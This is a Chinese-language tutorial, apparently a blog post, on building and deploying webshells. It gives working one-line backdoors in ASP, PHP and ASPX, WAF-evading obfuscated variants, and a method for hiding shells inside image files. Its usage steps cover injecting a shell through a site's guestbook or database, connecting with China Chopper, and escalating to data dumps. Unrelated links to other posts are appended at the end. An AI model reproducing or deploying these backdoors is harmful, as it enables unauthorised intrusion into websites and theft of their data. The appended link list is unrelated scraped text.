一、webshell制作原理

1、webshell种类
    一句话木马(使用的最多)、小马、大马、打包马、脱裤马等等

2、一句话木马
    介绍:短小精悍,并且功能强大、隐蔽性非常好,在入侵种始终扮演着非常重要的角色
    eg:<%execute request(“value”)%>
    解释:
    execute:是一个执行函数,用来执行该命令
    request:是接收提交方式,可接受post型、get型、cookie型的传参
    value:是参数,也是我们用菜刀连接时的密码
    http://www.xx.com/x.asp?value=  以这种方式接收命令

常见写法:
    asp一句话
    <%eval request(“pv”)%>
    PHP一句话
    <?php eval($_POST[a])?>
    
    aspx一句话
    <%@ Page Language=“Jscript”%>
     <%eval(Request.Item[“mima”],“unsafe”);%>
    jsp一句话:(也是一种小马)

一句话木马的变形(为了绕过waf)
    <?php $_REQUEST['a']($_REQUEST['b']);?>  
    这种方式已经淘汰了用不了了
    这个语句中没有执行函数,只有两个接收函数,使用的时候对参数a传递执行函数  /x.php?a=eval   然后再用菜刀连接
    <%Eval((Request(char(112))))%>
    用ascii码转码,不再使用单引号、双引号,防止闭合  
     
<%eval(eval(char(114)+char(101)+char(113)+char(117)+char(101)+char(115)+char(116)(“xindong”)%>
    用ascii码转码,不再使用单引号、双引号,防止闭合(asp用+号连接,php用.号连接)
    <%a=request(“gold”)%><%eval a%>
一句话图片马制作(隐写,建议使用搭建网站的素材图片)

c32或winhex做一句话
      用该软件打开图片,讲一句话代码放在最后面保存

cmd下做一句话
      copy /d 1.jpg+1.asp 2.jpg  不建议

也可以在图片属性中的详细信息中添加一句话(版权中)

常见的一句话客户端
    一句话客户端增强版
    中国菜刀  右后门  菜刀上传大马1,再删除菜刀码,大马1上传大马2,删除大马1,要脱三次
    中国砍刀
    lanker一句话客户端
    zv新型PHP一句话客户端GUI版
    
  3、小马
    体积小,易隐蔽,最重要的是与图片结合在一起上传后可以利用nginx或者iis6的解析漏洞来运行,不过功能少,一般只用来上传大马

4、大马
    体积大,50K大小左右,功能多,一般包括提权命令,磁盘管理,数据库连接接口,执行命令甚至有些具备自带的提权功能和压缩,解压缩网站程序功能,隐蔽性不好,而且大多数代码不加密或被查杀。

二、使用技巧

1、一句话的使用
   首先,找到数据库是asp格式的网站,然后,以留言板或者发表文章的方式,把一句话添加到数据库,或者网页。我们的目的是把一句话添加到数据库,无论任何方式。然后菜刀连接。

2、小马使用:
    主要用来上传大马

3、大马使用:
    提权、打包、脱裤、增删文件等等

4、使用技巧
  内容编码、配合解析漏洞、配合文件包含、利用文件名溢出
   文件包含代码,放在b.asp

<!--#include file="conn.asp"-->

conn.asp 就是要包含的文件

使用的时候直接访问b.asp,就会加载conn.asp文件

三、webshell“黑吃黑”

找shell后门

查找后门、查找webshell后门、找到后门地址、返搞webshell箱子

渗透知识-脚本木马的制作原理相关推荐

  1. 脚本木马的制作与原理

    webshell(web后门) 一.一句话木马 短小精悍,功能强大,隐蔽性好. <% execute request("value") %> 说明: 使用request ...

  2. web 渗透【4】脚本马的制作与原理

    webshell制作原理 webshell种类 一句话马(使用的最多).小马.大马.打包马.脱裤马... 一句话: 介绍:短小精悍,并且功能强大.隐蔽性非常好,在入侵种始终扮演着非常重要的角色 e.g ...

  3. Web安全—脚本木马工作原理(持续更新)

    Web安全-脚本木马工作原理(持续更新) Webshell分类: 一句话木马 大马 小马 打包马 脱裤马 拿到网站Webshell意义(Webshell的权限取决于Web容器运行的权限,通常为网络服务 ...

  4. GIS基础知识汇总篇(五)-无人机真正射影像的概念和制作原理

    正射影像应同时具有地图的几何精度和影像的视觉特征,特别是对于高分辨率.大比例尺的正射影像图,它可作为背景控制信息去评价其他地图空间数据的精度.现势性和完整性.然而作为一个视觉影像地图产品,影像上由于投 ...

  5. 手游辅助制作原理和学习思路

    手游辅助制作原理和学习思路 随着网络游戏不断发展 越来越多的人从事手游开发,现在的游戏公司为了能更好的有市场,不断提高游戏质量和服务,手游辅助由此诞生. 很多人都想做手游辅助,其中的原理大家都知道. ...

  6. 木马冰河之原理篇(深入浅出看木马)

    主题:木马冰河之原理篇(转载) 在网上,大家最关心的事情之一就是木马:最近出了新的木马吗?木马究竟能实现哪些功能?木马如何防治?木马究竟是如何工作的?本文试图以我国最著名的木马之一 冰河为例,向大家剖 ...

  7. 一句话木马的工作原理

    一句话木马的工作原理:一句话木马分析服务端与客户端. "一句话木马"服务端(是用于本地的html提交脚本木马文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp ...

  8. 平衡车制作---原理篇

    平衡车制作-原理篇 文章目录 平衡车制作---原理篇 前言 直立控制 直观感受 内部机理 速度控制 方向控制 总结 前言 本篇教程内容主要来自于<直立平衡车模参考设计方案>,且这里是从概念 ...

  9. Java版AVG游戏开发入门示例 3 ——脚本引擎的制作及应用

    源码下载地址:http://code.google.com/p/loon-simple/downloads/list 根据wikipedia的解释:脚本语言(Script language,scrip ...

最新文章

  1. linux ping程序设计与实现,一步步学Linux网络编程--ping命令的实现分析
  2. 心理成熟的十五条标准(转)
  3. nginx负载均衡集群
  4. 解决树莓派Virtualenv虚拟环境下GPIO问题
  5. python怎么输出图像测试_python pyautogui-不检测图像时的位置打印问题
  6. SAP FICO年结
  7. RxSwift之深入解析URLSession的数据请求和数据处理
  8. ubuntu创建wifi热点plasma-nm
  9. python编程菱形_Python打印“菱形”星号代码方法
  10. deviceiocontrol buffered 返回不了_这3种减肥法是无用功,累死累活也瘦不了
  11. KVM 通过virsh console连入虚拟机
  12. 漫步凸分析五——函数运算
  13. jquery 获取和设置 select下拉框的值
  14. 通过一个小Trick实现shader的像素识别/统计操作
  15. 软件的工程化管理(二)(转)
  16. iso22000食品安全管理体系_ISO22000-食品安全管理体系认证
  17. 有关错误:buffer i/o error on device fd0,logical block 0
  18. 计算机快速启动BIOS,bios设置快速启动
  19. win7下crtl+scroll会触发蓝屏重启(滑稽脸)
  20. ppt复制切片器_ppt中制作动态图表,并不难,使用powerbi三步搞定

热门文章

  1. java redis 命名空间_redis里通过命名空间存储缓存,根据结构生成树型
  2. 哪种营销方法效果最差_网络营销推广中如何监控评测网络效果?
  3. linux远程登录x11,windows linux 通过SSH X11Forwrding 使用图形化界面
  4. synology_用于在Synology NAS上测试Spring Boot Web应用程序的JUnit模拟文件
  5. java spring 服务器关闭_通过springboot怎么停止服务器??
  6. 给介绍下对象呗?这回答绝对专业!
  7. SpringBoot集成WebSocket,实现后台向前端推送信息
  8. 面试:说说你对 HashMap 的认识?
  9. 关于赠书《VS Code》断货延迟的通知!
  10. 2020,你还相信微服务?